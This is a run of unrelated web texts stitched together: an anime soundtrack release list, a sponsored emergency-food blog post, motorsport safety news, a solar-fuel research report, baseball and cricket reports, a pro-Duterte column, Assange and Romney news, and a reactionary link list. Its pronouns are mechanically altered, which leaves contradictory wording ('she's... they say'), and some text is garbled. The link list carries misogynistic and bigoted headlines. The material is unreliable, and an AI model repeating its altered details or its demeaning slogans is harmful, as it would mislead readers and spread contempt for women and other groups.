“ Who What ” – Ling toshite Shigure
– Ling toshite Shigure Amazon/CDJapan
Cross Ange ED2
“ Eden ” – Nana Mizuki
– Nana Mizuki Amazon/CDJapan
Dog Days ” OP
“ No Limit ” – Nana Mizuki
– Nana Mizuki Amazon/CDJapan
Juuou Mujin no Fafnir OP
“ FLYING FAFNIR “ – TRUSTRICK
– TRUSTRICK Amazon/CDJapan
Kamisama OP/ED
“ Kamisama no Kamisama/Ototoi Oide ” – Hanae
– Hanae Amazon/CDJapan
Sora no Method OST
P4GA OST2 ( bd5 )
21th
Cross Ange OP2
“ Shinjitsu no Mokushiroku ” – Yoko Takahashi
– Yoko Takahashi Amazon/CDJapan
Boueibu OP
“ Zettai Muteki ☆Fallin ' LOVE☆ ” – Chikyuboueibu
– Chikyuboueibu Amazon/CDJapan
Boueibu ED
“ I miss you no 3 Meter ” – Chikyuseifukubu
– Chikyuseifukubu Amazon/CDJapan
Junketsu no Maria OP
“ Philosophy of Dear World ” – ZAQ
– ZAQ Amazon/CDJapan
Rolling Girls OP/ED
“ Hito ni Yasashiku/Tsuki no Bakugeki Ki ” – The Rolling Girls
– The Rolling Girls Amazon/CDJapan
KimiUso OST
girlfriend Beta OST
Donten ni Warau OST ( bd first half )
Nobunaga Concerto OST ( dvd box )
28th
Shingeki no Bahamut ED ( bd1 )
“ Promised Land ” – Risa Shimizu
” – Risa Shimizu Amazon/CDJapan
Fafnir ED
“ Ray of bullet ” – Iris Freyja & Mitsuki Mononobe
” – Iris Freyja & Mitsuki Mononobe Amazon/CDJapan
Isuca ED
“ Somebody to love ” – TWO-FORMULA
– TWO-FORMULA Amazon/CDJapan
JJBA Stardust Crusaders OP2
“ Jojo Sono Chi no Kioku – End of The World ” – JO STARS ( Tommy , Coda , Jin )
” – Amazon/CDJapan
Koufuku Graffiti OP
“ Shiawase ni Tsuite Watashi ga Shitteiru Itsutsu no Houhou ” – Maaya Sakamoto
” – Maaya Sakamoto Amazon/CDJapan
Kuroko no Basket 3 OP
“ Punky Funky Love ” – GRANRODEO
” – GRANRODEO Amazon/CDJapan
Saekano OP
“ Kimi-iro Signal ” – Luna Haruna
” – Luna Haruna Amazon/CDJapan
Saekano ED
“ Colorful . ” – Miku Sawai
. ” – Miku Sawai Amazon/CDJapan
Yoru no Yatterman OP
“ Kyokugen Dreamer ” – SCREEN mode
” – SCREEN mode Amazon/CDJapan
Mushishi OST
Corona OST5 ( bd5 )
Shirobako OST1 ( bd2 )
Terrorformars OST “ MARS ”
So yep , that 's it . Once again I apologise for the delay , and hopefully the February one will be out asap . In the meantime please leave comments below as to which tracks are you highly anticipating . 🙂
Advertisements
Because my husband and I believe in being prepared for emergencies , we try to keep on hand extra food just in case . When we stock up , much of the food that we buy is canned food or dehydrated food because it is already cooked and shelf stable . Having a bunch of cans stacked on top of each other in the pantry can be an accident waiting to happen . It makes much more sense to store them in a can organizer . Not only does it keep the cans from toppling to the ground , it helps keep your supply rotated . Add to the back and take from the front .
This post may be sponsored . Post contains affiliate links . I may be compensated if you make a purchase using my link .
Can Organizer – Emergency Preparedness
You do n't need to be limited to canned food in your emergency supply stock . There 's a wide range of tasty dehydrated food that you can keep on hand in case you loose power . You can find almost everything dehydrated including dairy , vegetables , fruits , grains , meats , beans , desserts and soups . These are shelf stable so they have a very long shelf life and generally only need the addition of water to turn them into a tasty meal . Dehydrated foods are generally packaged in large cans for easy stacking with a lid that you can remove and then put back on top to make them last longer . You can take out and prepare just what you need whether that 's for one person or ten .
I received samples of the Thrive Foods chicken , onions and celery from Carolina Food Storage . I 'd never tried these particular products before so I was curious to see how they tasted . Because they are sample sized , they were in resealable bags instead of in cans . It was a simple matter of adding water and waiting to prepare a delicious Chicken Salad recipe . The sample size is ideal so you can taste the product before you stock up . You want to make sure you like the taste before you buy five cans to put in your emergency preparedness pantry . Check out my recipe to see how amazingly yummy this was . There 's no way I would have believed that it came from shelf stable food .
Carolina Food Storage offers a variety of emergency preparedness supplies including food rotation systems , shelf stable food , emergency supplies and tools . There 's also a very handy article I recommend that you read that explains how much food you should store for emergency preparedness . You do n't want to find out in an emergency that you do n't have enough food on hand .
One of my lucky readers will win their very own small can organizer so they can start storing emergency preparedness food .
a Rafflecopter giveaway
Disclosure of Material Connection : I received one or more of the products or services mentioned above for free in the hope that I would mention it on my blog . Regardless , I only recommend products or services I use personally and believe will be good for my readers . I am disclosing this in accordance with the Federal Trade Commission 's 16 CFR , Part 255 : “ Guides Concerning the Use of Endorsements and Testimonials in Advertising ”
DJR Team Penske has moved to help improve driver safety in V8 Supercars by developing a protection tray that could be made mandatory in 2016 .
The team sprung into action following the Supercheap Auto Bathurst 1000 , where Prodrive 's Chaz Mostert and DJRTP 's Scott Pye were both injured in heavy accidents .
Mostert 's left femur snapped at the base of their seat during a 50g impact with the concrete on the run to Forrest 's Elbow , while Pye fractured a rib when their car hit the concrete at Sulman Park .
Designed by one of DJRTP 's locally based American engineers , the protection tray is similar to that seen in NASCAR and effectively extends the sides of the seat to limit the movement of drivers ' legs during accidents .
It is also similar in concept to the E-cell developed by HWA and run in Erebus ' cars , but is seen as a more cost-effective solution as it utilises the standard V8 Supercars seat .
Although DJRTP 's prototype tray has been made out of aluminium , the final version would be constructed out of a fire resistant carbon fibre .
DJRTP managing director Ryan Story says that their squad is eager to utilise expertise from NASCAR and IndyCar to improve V8 Supercars safety wherever possible .
“ We have a recent NASCAR sitting in our shop and when you pair that with the level of safety expertise that Team Penske has , we 're fortunate to have significant resources to draw from , ” Story told Speedcafe.com .
“ After the crash Tim Cindric ( Team Penske president ) gave the direction that we would engage our lead designer , who has quite a lot of experience in the field , to explore some solutions .
“ We want to make sure that when an accident like that occurs again , we 've done the most we can to avoid seeing similar injuries to what Chaz had .
“ This is very similar to the tray that is run in NASCAR , where safety is taken very , very seriously and has been the subject of a lot of investment over the years .
“ We 're fortunate also to have Marcos ( Ambrose ) , who has more crashes at 200mph ( 320km/h ) than anyone else in our category , as part of our team as well .
“ He has some very forthright views on the direction that we need to be taking and has played an active role in ensuring that some of the key people at V8 Supercars are able to benefit from their experience .
“ This certainly wo n't be the last time that we look to do something like this for the category . ”
Fitted to the chassis that Pye crashed at Bathurst , the tray was inspected by V8 Supercars ' sporting and technical director David Stuart and category medical delegate Dr Carl Le at DJRTP 's headquarters little more than a week after Bathurst .
DJRTP 's member on the category 's Technical Advisory Panel , Nick Hughes , is scheduled to formally present the design for discussion at the next meeting , which coincides with the Coates Hire Sydney 500 .
Stuart has meanwhile confirmed to the V8 Supercars website that the category is also looking at other safety solutions in the wake of Mostert 's Bathurst crash , where the driver broke both their leg and their left wrist .
A grab handle to avoid similar wrist injuries and even the possibility of adopting paddle-shifts to remove the central gear stick from the cars are both under discussion .
Stuart 's department will present formal safety reports to both the FIA and CAMS following input from the TAP members .
On The Horizon : Liquid Fuels Made By Sunlight
toggle caption Matt Cardy/Getty Images
Sunlight pours a lot of energy onto the surface of the Earth . But one huge challenge is to figure out how to capture that energy and turn it into fuels to power our cars and trucks .
Fossil fuels wo n't last forever , so scientists and engineers are looking for new and efficient ways to capture solar energy for fuel . One promising technique relies on a common material most people have never heard of : the element cerium .
The ultimate goal is to say , 'How can we take solar photons and convert that into a liquid fuel at higher efficiencies than we know we can do using plants ? '
Cerium `` is chemically similar to what we call the rare earth metals , but it turns out not actually to be rare , '' says Sossina Haile , a professor of materials science and chemical engineering at Caltech . It 's about as abundant as copper , and is quite useful .
Haile has been experimenting with cerium because , at the right temperature , it can turn carbon dioxide and water into energy-rich fuels .
But there is one hang-up : `` The catch is certainly that the temperatures have to be high , '' they say . Really high -- nearly 3,000 degrees Fahrenheit . Obviously , this process would be utterly useless if you had to use an energy guzzling furnace to make fuels .
A Dent On U.S. Energy Production ?
So earlier this year , Haile got together with some colleagues in Switzerland and figured out how to put cerium inside a device that can generate those tremendous temperatures by concentrating solar energy .
And they did it -- they were able to make synthetic fuel from just water and carbon dioxide . As they report in the journal Science , the system was n't very efficient -- less than 1 percent of the solar energy got converted into fuel . But there is hope .
`` If we had a perfect reactor , '' Haile says , `` we should easily get 10 percent efficient . ''
And because the cerium does n't get used up in the reaction , it can be used over and over again .
`` We went through the big numbers and said , 'Would this make any dent on U.S. energy production ? ' And the answer is yes , '' they say .
The trick with any technology , though , is to figure out whether you can develop it in a practical and relatively inexpensive way . A few years ago , the Department of Energy recognized the promise -- and the perils -- of technologies that use solar energy to make liquid fuels rather than electricity , as solar panels do . It established an organization called ARPA-E -- the Advanced Research Projects Agency for Energy .
Better Than Plants ?
Eric Toone , a chemist at Duke University , directs an ARPA-E program that supports research on ideas that incorporate biology to accomplish what Haile is trying to do with straight chemistry and engineering .
`` The ultimate goal is the same , right ? The ultimate goal is to say , 'How can we take solar photons and convert that into a liquid fuel at higher efficiencies than we know we can do using plants ? ' `` Toone says .
Plants right now are grown to produce biofuels , like ethanol from corn . But green plants typically convert far less than 1 percent of sunlight into fuel .
`` So the name of the game is to say , 'Well , can we do better than that ? ' `` they say .
To find out , ARPA-E has pumped research dollars into more than a dozen universities and small companies across the country . Most projects are just getting under way , and Toone says it 's clearly too early to start picking winners and losers . But they are full of optimism .
`` This is absolutely a solvable problem . Realistic time frames ? I suspect we are 10 to 15 years away from actual fuels that you can buy at a pump and put into your vehicle , '' they say . `` But I do very , very , very strongly believe that this is going to happen . ''
Caltech professor Haile says she 's not saying their approach is the best , but it is an example of something that could pan out .
`` I personally view that the challenges that remain are very surmountable , '' they say .
The crux here , like all technologies , is that someone needs to invest the considerable time and money to find out what 's really going to work . Intriguing ideas , like hers , are just the starting point for innovation .
`` This is something that a company would need to be interested to take it forward , '' they say .
Diamondbacks outfielder David Peralta will undergo season-ending surgery on their right wrist Thursday , reports Steve Gilbert of MLB.com ( Twitter link ) . Peralta 's right wrist has been an issue since they first injured it last year , when they were informed that they may have irritated a ligament , and they have endured two different stints on the disabled list this season because of it . Arizona sent them to the DL on Sunday , and now their 2016 will come to a premature end .
As has been the case with their last-place team , 2016 has been an enormous disappointment for Peralta . After combining to hit .301/.351/.492 with 25 home runs in 865 plate appearances from 2014-15 , Peralta 's offensive output dipped to .251/.295/.433 with four HRs in 183 trips to the plate this season .
Injuries obviously did n't help matters for Peralta , who also spent time on the DL with a lower back strain , nor have the lengthy absences of them and star center fielder A.J . Pollock aided a 47-66 club that entered the season with playoff aspirations . Pollock has missed the entire year because of elbow surgery , though they are working their way back and could return sometime this season . In the meantime , the D-backs will have to rely on the underwhelming group of Michael Bourn , Yasmany Tomas , Socrates Brito , Brandon Drury and Rickie Weeks Jr. in the outfield , as their depth chart indicates . With little contribution from Peralta and none from Pollock , Arizona 's outfield ranks last in the majors in fWAR ( minus-1.9 ) .
Going forward , the ultra-cheap Peralta ( $ 529,600 ) wo n't be arbitration eligible until after next season , so the Diamondbacks will get another inexpensive year from him . They also control their rights through the 2020 campaign .
by
Dublin .
Is there a land more deserving of change than the Philippines ? Probably not . Isolated on the fringe of global capitalism the Philippines has for over a century been a pawn for US imperialists . And as a result it has suffered greatly .
A hundred million people strong , the Philippines is a country controlled by a tiny elite ( not a 1 % but a 0.1 % ) . Consequently it has poverty levels equivalent to those found in Haiti .
Twenty five percent of the Filipino people live below the poverty line . That is , 25 million Filipinos live on less than a dollar a day . And the vast majority of the rest live on just a few dollars more a day . It follows that income inequality in the Philippines is the greatest in East Asia .
In reality this means , for example , that 60 % of the Filipino population will die without seeing a health professional . Which is absurd because in the English speaking world so many of the health professionals are Filipino .
For nearly all the Filipinos emigration is the only solution to this misery and injustice . Around 10 million Filipinos live and work abroad . And every year a million more try to join this extraordinary exodus ( one that began in a systematic way in the 1970s ) . And the money sent home from this enormous migration ( approximately $ 30 billion a year ) keeps the Philippines alive .
Another solution to Filipino misery and injustice is armed rebellion . For decades significant numbers of Filipinos have picked up the gun to fight for change . Communist and Islamic insurrections on the one side and military coups on the other side haunt the country . As does the US military which has recently been invited back into it 's old imperial bases .
Yet another solution to the misery and injustice is the limited democratic vote . And last Monday ( May 9 ) the Filipinos used it in a desperate but imaginative way by voting into power an outsider . On Monday Rodrigo Duterte , the longtime mayor of a provincial city ( Davao ) , was elected President of the Philippines .
This popular outsider is infamous for their crude language and crude policies . Linked to distasteful profanities and disturbing death squads , the new leader is anything but a member of the Manila elite and it 's Americanised hypocrisy . Dressing like a common man and speaking like a common criminal Duterte comes from the guts of Filipino society . And for that reason they are a realistic representation of the Filipino state . This is ironically a welcome change .
The vote for Duterte is a rejection of “ business as usual ” . The vote suggests that Filipinos are fed up with the corrupt status quo . Instead of continuing with the dead end norm they are willing to take a chance with an alternative populist rather than another elitist . There is hope in this .
Even though Duterte 's plans depend upon the army and police and even raise the possibility of martial law ( in the fight against chronic crime ) they disrupt the smooth neoliberal and neo-colonial agenda that the outgoing President ( Benigno Aquino III ) was promoting . So much so that Duterte has reached out to the Communist Party of the Philippines and it 's New People 's Army .
Even though Duterte will seek to maintain economic growth at the current business friendly level of 6 % per annum , they speak of progressive taxation , public investment and agricultural subsidies . Neoliberalism may still be the hegemonic discourse in the Philippines but the indications are that the people 's patience is cracking .
However the greatest hope for the Filipinos and indeed for the world is Duterte 's potential foreign policy . The signs are that they want to place the needs of the Filipino nation before those of the US empire . During the election campaign they said that they did n't want to wage a war against China 's actions in the South China Sea . Instead they suggested that diplomacy was the answer . In a few “ crude ” sentences Duterte derailed US warmongering in Asia . The great hope is that they will do as they say .
Duterte 's politics are eclectic but they are in tune with the times we live in . Throughout the world alternative voices beyond the elite and closer to the ground are coming to the fore . And they are breaking the neoliberal mold . Duterte belongs to this trend . Let 's wish them and our Filipino sisters well . They deserve a change . Let 's hope they direct their crudeness against the real enemies of the great Filipino people ( that 0.1 % and it 's US master ) .
Mr Assange is expected to voluntarily attend a police station within the next 24 hours , and will then appear in a magistrates ' court . They are wanted over allegations of sexual assault in Sweden .
They are currently in hiding in the south-east of England but police are understood to have the necessary paperwork to arrest him .
Mark Stephens , Mr Assange 's British lawyer , said : “ We are in discussions about them going to the police by consent . ”
Mr Assange suffered another setback on Monday when Swiss authorities closed one of their bank accounts , one of the sources of funding for the WikiLeaks site .
The 39-year-old Australian has been under intense pressure since the release of thousands of secret documents in recent weeks .
Kristinn Hrafnsson , spokesperson for WikiLeaks , said Mr Assange had been forced to keep a low profile after several threats on their life .
Sweden 's Supreme Court upheld a court order to detain Mr Assange for questioning on suspicion of “ rape , sexual molestation and unlawful coercion ” after they appealed against two lower court rulings . They deny the allegations .
Their details were also added to Interpol 's most wanted website , alerting police forces around the world .
A European Arrest Warrant was issued by the Swedish last month but could not be acted upon because it did not contain sufficient information for the
British authorities . A spokesperson for Marianne Ny , the Swedish prosecutor , said the extra details were sent last week and were being processed .
Mr Stephens said they would fight any bid to extradite their client . They added that Mr Assange “ has been trying to meet with the Swedish prosecutor since August this year ” .
Mr Assange 's troubles deepened when their Swiss bank account was shut down after it was found they had given a false address . Postfinance , the financial arm of Swiss Post , said : “ The Australian citizen provided false information regarding their place of residence during the account opening process . ”
Mr Assange had allegedly told Postfinance they lived in Geneva but could offer no proof that they were a Swiss resident .
News of their potential arrest came as WikiLeaks was criticised for publishing details of hundreds of sites around the world that could be targeted in terrorist attacks .
Among the British sites listed are a transatlantic undersea cable landing in Cornwall ; naval and motoring engineering firm MacTaggart Scott , based in the small Scottish town of Loanhead ; and BAE Systems sites , including one in Preston , Lancashire .
The revelations prompted Sir Peter Ricketts , David Cameron 's national security adviser , to order a review of computer security across all government departments .
Candidate Donald Trump wraps up a three day swing through Florida with another massive evening rally in Tallahassee at The Tallahassee Car Museum . At 4:00pm there is a two mile long traffic jam of cars headed into the venue . [ Pre-Rally Video HERE ] The rally is scheduled to begin at 6:00pm EDT :
Live Stream Link – Alternate Live Stream # 1 – Alternate Live Stream # 2
Hey from Tallahassee , FL where the line to get off the highway exit to see Trump at 6pm is backed up WELL over a mile . Nuts . pic.twitter.com/Mz8VLOAL7h — Charlie Warzel ( @ cwarzel ) October 25 , 2016
Traffic to Trump Rally in Tallahassee back miles long pic.twitter.com/Qrw8IVJUeJ — Bing Xu ( @ BingXu2015 ) October 25 , 2016
Just arriving at Trump 's Tallahassee rally spot . The line of vehicles backed up at its highway exit is about 2 miles long . — Scott Detrow ( @ scottdetrow ) October 25 , 2016
Advertisements
In-Game Screenshots
Start with a single planet , and a small empire on the verge of venturing into space . How you build your empire is your choice , whether you improve your home planet first , or immediately research space travel is up to you . But know , you are not alone . There are many other empires out there , some friendly , others not . Broaden your empires horizons , explore the wonders of space , and reign supreme in Delta Quadrant : Horizons . Delta Quadrant : Horizons is a multi player , browser based space strategy game , part of the Delta Quadrant universe . The game offers a rich variety of technologies , spaceships and buildings , as well as a huge range of development possibilities for the player . You can play Delta Quadrant : Horizons directly from your web browser without monthly fees .
If there 's one thing Mitt Romney can not stand , it 's when President Obama blames the economic situation they inherited from former president George W. Bush for the country 's current gloomy challenges .
“ What he 's very good at is finding other people to blame , ” Mr. Romney said at a fund-raiser in San Diego recently . At an event in Michigan , they mocked Mr. Obama for trying to evade responsibility for the economy by blaming “ his predecessor , the Congress , the one percent , oil companies , and A.T.M.s . ”
So it was interesting to hear Mr. Romney 's own aides over the weekend try to explain some of the less flattering statistics from Mr. Romney 's time as governor of Massachusetts .
“ He inherited a $ 3-billion projected deficit , ” Ed Gillespie , a senior adviser to Mr. Romney , explained on Fox News Sunday .
Mr. Gillespie said it was unfair to judge Mr. Romney 's record on job creation by including all four years of their tenure . They said the statistic that Mr. Romney was 47th in job creation during their time in office was calculated by “ diluting it with the first year in office , when they came into office , and it was 50th in job creation . ”
Essentially , they were arguing that Mr. Romney 's first year , in 2003 , should n't be counted .
Eric Fehrnstrom , another top aide to Mr. Romney , also blamed the situation that the governor inherited — paradoxically , from Republican governors who occupied the Statehouse for the previous 12 years .
“ When Mitt Romney arrived , Massachusetts was an economic basket house , ” Mr. Fehrnstrom said on ABC 's “ This Week ” program on Sunday . “ If you throw D.C. into the mix , we were 51 out of 51 . ”
Mr. Obama 's team was incredulous . On a conference call with reporters , David Axelrod , a senior adviser to the president 's campaign , accused Mr. Romney 's campaign of “ breathtaking hypocrisy ” for using the same excuse that their candidate has been hammering the president for .
“ Their answer to all of this was . ‘ Well you really ca n't include their first year because you know they inherited a really tough economic situation , ' ” Mr. Axelrod said . “ They 've painted themselves into a corner here . And now that double standard is clear and they 're going to have to explain it to the American people . ”
In fact , the most serious attacks from Mr. Romney involve exactly the kind of focus on Mr. Obama 's first year in office that the Republican advisers were trying to avoid .
Mr. Romney frequently says that Mr. Obama has presided over an economy that has lost hundreds of thousands of jobs . In a recent news release , the Republican campaign said , “ Under President Obama , the nation has lost 552,000 jobs . ”
But that statistic includes Mr. Obama 's first year in office , and especially the months of February , March and April , when monthly job losses from the economic collapse were at 700,000 or higher .
Just ignoring February of 2009 , before any of Mr. Obama 's policies — including the economic stimulus — had been put into place , would wipe away all 552,000 lost jobs , giving the president a record of creating 172,000 jobs .
If Mr. Romney 's team were to ignore Mr. Obama 's first year in office — as Mr. Gillespie suggested should be done for Mr. Romney 's first year as governor — then the president would have added about 3.7 million jobs to the economy .
Of course , Mr. Romney 's campaign is unlikely to change its rhetoric or strategy . Their bid for the White House depends on the idea that Mr. Obama has made the economy worse . Because the country has been adding jobs for nearly two years , Mr. Romney 's argument depends on the steep job losses in Mr. Obama 's first year in office .
But the campaign does need to find a way to defend Mr. Romney 's record as governor against the criticism that the state lagged behind the rest of the country in job creation while they were in office .
Mr. Obama 's campaign is making that charge aggressively . Mr. Axelrod said on Monday that the campaign is spending about $ 10 million on a television ad that tries to undermine Mr. Romney 's gubernatorial record . The ad is running in nine battlegrounds states .
“ When Mitt Romney was governor , Massachusetts lost 40,000 manufacturing jobs , ” the narrator in the ad says . “ And fell to
47th in job creation . Fourth from the bottom . ”
Both campaigns face the same conundrum : their candidate governed in periods following economic slowdowns that weigh down the statistics that might otherwise look rosier .
On Fox News Sunday , Mr. Fehrnstrom urged viewers to look at how Mr. Romney fared at the end of their term , when the economy had fired back up again . By that measure , they said , Massachusetts was not 47th in job creation .
“ By the time Mitt Romney left four years later , we were in the middle of the pack , ” Mr. Fehrnstrom said . “ We were 30th in the nation in terms of job growth . That 's the trend line that you want to see . ”
.......... .......... .......... .......... .......... .......... .......... .......... .......... .......... .......... .......... .......... .......... .......... .......... .......... ..........
GALLUP , N.M. — The state of New Mexico has volunteered to issue Amber Alerts for the Navajo Nation .
The Gallup Independent reports ( http : //bit.ly/1hoDjlp ) that under the proposed system , New Mexico would notify both Arizona and Utah if the tribe issues an Amber Alert . The New Mexico system would be in place while the Navajo Nation Alert System Task Force plans a 911 system for the tribe .
The task force was established in after residents raised concerns about the Amber Alert system after the May 2 disappearance of an 11-year-old girl and their 9-year-old brother . The girl was found dead the next day . The boy returned to their family .
___
Information from : Gallup Independent , http : //www.gallupindependent.com
Not all of the news that Android Police has been able to nail down about Google 's upcoming hardware is positive . In addition to a lack of MicroSD card slots ( despite some exciting new functionality in Android Marshmallow ) and a lack of wireless charging ( despite the fact that the last three generations of Nexus phone had it ) , both LG 's Nexus 5X and Huawei 's Nexus 6P wo n't have optical image stabilization built into their rear cameras .
That 's definitely a bit of a bummer , especially since the Nexus 5 ( 2013 ) and Nexus 6 ( 2014 ) both included the premium camera feature . Optical image stabilization adds extra elements to a camera lens or module that can compensate for a small amount of vibration , such as a slight wobble in the hand of the user . Since taking photos on a phone can be difficult enough thanks to low weight and a lack of grip , it 's been a popular add-on for premium smartphone designs for the last few years . A module that compensates for vibration is also a huge boon when taking low-light photos .
We do n't have a hard reason for the exclusion on the latest Nexus phones , though it 's a pretty fair bet that Google simply wanted to keep the price for both as low as possible . ( Last year 's Nexus 6 earned no small amount of complaints for its flagship $ 650 starting price , and the Nexus 5X and Nexus 6P will start at $ 379.99 and $ 499.99 , respectively . ) In the case of the 6P , it might have something to do with the non-standard , extra-dense sensor , but that 's just speculation .
Update : we 've confirmed that the lack of image stabilization is , in fact , due to the new 1.55µm pixels in the image sensor . Presumably that means that the Nexus 5X will include an extra-dense camera sensor as well .
Google 's Nexus announcement is tomorrow , September 29th in San Francisco . Both phones are expected to be available for pre-order after the event .
ICC World Twenty20 semi-final , St Lucia :
Australia 197-7 ( 19.5 ovs ) bt Pakistan 191-6 ( 20 ovs ) by three wickets
Match scorecard Hussey rescued Australia with one of the greatest Twenty20 innings ever seen
By Jamie Lillywhite
Mike Hussey hit an exceptional unbeaten 60 from 24 balls as Australia beat Pakistan by three wickets to set up an ICC World Twenty20 final with England . Pakistan made a huge total of 191-6 in St Lucia , with Kamran Akmal making 50 and their brother Umar blasting four sixes in an unbeaten 56 from 35 balls . Cameron White hit five sixes in 43 from 31 balls but Australia seemed out of it needing 70 from the final five overs . Yet Hussey 's three sixes in the last over sealed it with a ball to spare . It was the third highest winning run chase in Twenty20 internationals and arguably one of the greatest finishes to any match . Few sides would have got close to the defending champions ' total , which was the joint second-highest of the tournament , having lost so many wickets . 606 : DEBATE Australia , how did they do that ? Never write off the green and gold . See you in the final , England . It should be a cracker !
Linebreaker Michael Clarke 's side must have thought the match had slipped from their grasp when Steve Smith was the seventh wicket to fall and 48 was still needed from 17 balls . But , as has happened so often before , the Australians found a saviour in the hour of their greatest need . The 34-year-old Hussey , known as Mr Cricket to their team-mates , hit six sixes in all to steer their side to an amazing victory and set up a mouthwatering final against their Ashes rivals on Sunday . The Australians will look to improve their performance in the field , which had been unusually ragged having won the toss and put Pakistan into bat . They were knocked out of kilter by the stunning strokeplay of the Akmal brothers and seemed unable to fathom a way of stemming the runs as Pakistan , who had won only two of their five matches going into the semi-final , rose to the occasion . Dirk Nannes began with eight dot balls to Kamran as only two singles and a wide came from the first two overs before the Pakistan openers , and Akmal in particular , cut loose superbly . Kamran hit over cover for four then drove the next ball drown the ground for another boundary , while in the next over Salman Butt fizzed successive boundaries as the runs started to flow . Umar led Pakistan to the joint second highest score of the tournament Butt was on 10 when they appeared to edge Mitchell Johnson but there was no significant appeal , and when leg-spinner Smith was brought into the attack after the powerplays their first over went for 15 as Kamran launched a six over long-off . A disgruntled Shane Watson , after one over for eight , switched ends but was dispatched for 18 as Kamran hit a mammoth six down the ground that landed in the lap of ICC chief executive Haroon Lorgat and added successive fours to reach their fifth T20 fifty from 32 balls . Their impressive innings ended when Warner dived forward in the deep to hold a superb low catch , ending an opening stand of 82 from 59 balls . Warner was soon in the action again as Butt swept Smith aerially and the outfielder moved swiftly across to take a neat catch . There was a relative lull with 29 runs coming from the next four overs , Shahid Afridi top-edging straight up to wicketkeeper Brad Haddin , but Khalid Latif swept Clarke onto the roof at mid-wicket then hammered the next ball down the ground for four . Umar then thumped Nannes for six over long-on before deftly flicking the next ball over short fine leg for four . The 19-year-old raced to fifty with even more alacrity than their brother , reaching the half century from 29 balls after three sixes in the 18th over from Johnson that saw 24 added to the total . With Australia beginning to feel the pressure and allowing byes , wides and overthrows that were unthinkable in their previous matches , Razzaq smashed David Hussey over long-on for six and the momentum just kept flowing for Afridi 's team as Warner was caught at point for a duck in the first over of the reply . Mohammad Aamer gave Pakistan a great start with the ball Watson and Haddin briefly revived the Australians by taking 15 from the next over from Razzaq , but Watson then hit teenage left-armer Mohammad Aamer straight to long-on . Haddin and Clarke took their side to 53-2 after the six powerplay overs but Haddin was drawn out of their crease expertly by slow left-armer Abdur Rehman and easily stumped , leaving the required rate at almost 11 per over . Kamran 's outstanding match continued as they smartly whipped off the bails when Clarke lunged at one from Afridi in the next over . White then struck three sixes in four balls off Afridi and Mohammad Hafeez as the requirement became 100 from 49 balls , promptly reduced by six as David Hussey launched Hafeez over long-off . Australia 's unlucky number struck as with 87 needed Hussey got a leading edge to give Rehman a simple return catch but a 90-metre six from White gave Australia a glimmer of hope with 70 needed from the final five overs . Mike Hussey then hit successive sixes as Afridi dropped short and astonishingly the pressure appeared to be back on Pakistan . But White hit a low full toss from Aamer straight to long-off in the 17th over and four balls later , the wily spinner Saaed Ajmal drew Smith out of their crease to allow Kamran another stumping . The indefatigable Mike Hussey pulled their third six to leave 34 from the final 12 balls then managed to flick the final ball of the penultimate over for four , leaving 18 from the last six , bowled by Ajmal . After Johnson gave Hussey the strike with a single , however , victory seemed inevitable as the next two balls were thumped into the legside for six and Hussey won the match with their sixth maximum .
Bookmark with : Delicious
Digg
reddit
Facebook
StumbleUpon What are these ? E-mail this to a friend Printable version
Practice is 1/3 , talent is 2/3 .
How to make money online .
Related : How to get rich .
Related : How not to handle your finances .
3 charisma tips .
Do n't die like a mouse .
Telling a man their fiancé is cheating on them is the decent thing to do .
Women 's mating strategies and polygamy .
Related : The new sexual morality .
Related : Why women are no longer attracted to providers .
Related : Female education is dysgenic .
A little advice for protecting yourself from the knock-out game .
Related : Motte-busting .
Related : Why you need to respond to the left .
Capturing Gnon .
A Cathedral link compilation .
You are the counter-culture : Turn on , tune in , drop out .
We ca n't save the system , but we can preserve pieces of civilization .
Civilization 's precipice .
The welfare state : a sign of civilizational decline .
Related : Rising civilizations are different ; declining the same .
Related : Salon headlines .
Related : Women , pop music , and the Arab decline .
Related : American Pie : How much the culture has declined in only 15 years .
Related : Our narcissistic society in action .
Related : Frivolity accompanies pessimism .
Related : An influx of foreigners into the capital is a sign of decline .
Related : Peter and Jane at the art museum .
The decline in global IQ .
Explaining the decline in fertility .
Related : Fertility rates are dropping worldwide .
How leftism and homosexuality are destroying male friendship .
Jim and Anissimov on the economics of children .
Related : A response to criticism of the original article .
Judge argues in favour of incest using homosexuality as an example . The slippery slope is real .
Colonialism benefited the colonized .
On the ENR .
Related : Dialogues on evo-psych and Kevin MacDonald .
Libertarianism and consumerism .
Related : The capture of conservatism by libertarianism .
How communism was funded .
On social spaces .
The inverted samurai ethic of racial politics .
The only way to have diversity is through fascism .
‘ Controversy ' generally means something progs hate .
Demography and dysgenics .
The paradox of ecclesiology .
On immigration and charity .
Related : Mexico makes deal to send more illegal to the US .
The importance of silence .
The end of the Anglican Church .
Younger evangelicals still hold to social conservatism .
More churchian male-shaming .
On Joan of Arc .
Feminism is a sin against children .
If you are irreligious man in the West , there is no reason to get married .
A message from a man in a dead bedroom .
Related : An evil slut defends hating their husband .
The ravages of time .
Related : Humour : A few more items off the list of desirable traits .
Related : The sad fate of Stacey Hacker-Hessler , professional crusader .
Even in film , you can never satisfy a feminist .
Man spends 9 years in jail after daughter falsely accuses them of rape . Daughter let off without punishment .
Related : Two teens exchange nudes . Male charged , female not ; state wants to sexually assault male .
Related : NZ will presume those accused of rape guilty .
Sex difference in spacial reasoning greater in more egalitarian societies .
Is Jezebel racist or lookist ?
Hiring and political correctness .
Some “ men ” are beyond hope .
The religious beliefs of the 10 smartest people .
Related : Godel 's proof for God proved true .
An estimate of the death toll of the Cold War .
Traditional sleep patterns .
Inflation being disguised by putting wood pulp in your burger .
Science : Chimp IQ is genetic .
On left-wing “ refutations ” .
Leftists still devour their own .
On Tiananmen Square .
Iraq has informed the UN that ISIS has taken control of thousands of chemical weapons .
Rolling Stone 's top 5 most dangerous guns . Are these people really this stupid ?
Vox comments on literary propaganda in SF/F .
H/T : VD , RPR , SCC , Land , SDA , TH
Feb 9 , 2015 ; Denver , CO , USA ; Oklahoma City Thunder forward Kevin Durant ( 35 ) during the game against the Denver Nuggets at Pepsi Center . Mandatory Credit : Chris Humphreys-USA TODAY Sports
The Washington Wizards are hoping to sign Kevin Durant this summer , but the on-court fit might be a bit awkward
It 's easy to look at a player like Kevin Durant and assume they would be a perfect fit wherever they land this summer . But , as we 've seen in the past with top free agents , that 's not always the case .
The Washington Wizards seem like a fantastic fit for the former MVP . He 's the hometown kid , John Wall talked about the team needing another star and he 's as unselfish as they come . On the court , though , there could be some problems .
